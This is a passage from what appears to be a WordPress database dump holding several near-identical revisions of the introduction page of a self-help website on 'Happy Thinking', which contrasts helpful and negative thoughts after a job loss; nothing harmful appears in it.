-->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-10 08:47:40', '2023-06-10 08:47:40', '', 88, 'https://www.happythinking.com/?p=1780', 0, 'revision', '', 0),
(1776, 1, '2023-06-08 12:44:37', '2023-06-08 12:44:37', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1773,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyblueworries080623.jpg" alt="" class="wp-image-1773"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1775,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happyyellowworries080623.jpg" alt="" class="wp-image-1775"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising negative thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-08 12:44:37', '2023-06-08 12:44:37', '', 1034, 'https://www.happythinking.com/?p=1776', 0, 'revision', '', 0),
(1779, 1, '2023-06-08 13:49:11', '2023-06-08 13:49:11', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1773,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyblueworries080623.jpg" alt="" class="wp-image-1773"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1775,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happyyellowworries080623.jpg" alt="" class="wp-image-1775"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1777,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning080623.jpg" alt="" class="wp-image-1777"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-08 13:49:11', '2023-06-08 13:49:11', '', 1034, 'https://www.happythinking.com/?p=1779', 0, 'revision', '', 0),
(1786, 1, '2023-06-10 21:57:55', '2023-06-10 21:57:55', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1785,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_100623.jpg" alt="" class="wp-image-1785"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-10 21:57:55', '2023-06-10 21:57:55', '', 1034, 'https://www.happythinking.com/?p=1786', 0, 'revision', '', 0),
(1782, 1, '2023-06-10 21:14:41', '2023-06-10 21:14:41', '', 'yellowunhappy_100623', '', 'inherit', '', 'closed', '', 'yellowunhappy_100623', '', '', '2023-06-10 21:14:41', '2023-06-10 21:14:41', '', 1034, 'https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg', 0, 'attachment', 'image/jpeg', 0),
(1787, 1, '2023-06-10 21:59:14', '2023-06-10 21:59:14', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1785,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_100623.jpg" alt="" class="wp-image-1785"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Click on the button to go to the next section.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-10 21:59:14', '2023-06-10 21:59:14', '', 1034, 'https://www.happythinking.com/?p=1787', 0, 'revision', '', 0),
(1788, 1, '2023-06-10 22:00:13', '2023-06-10 22:00:13', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common types of negative thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1785,"sizeSlug":"full","linkDestination":"none"} -->\n<figure 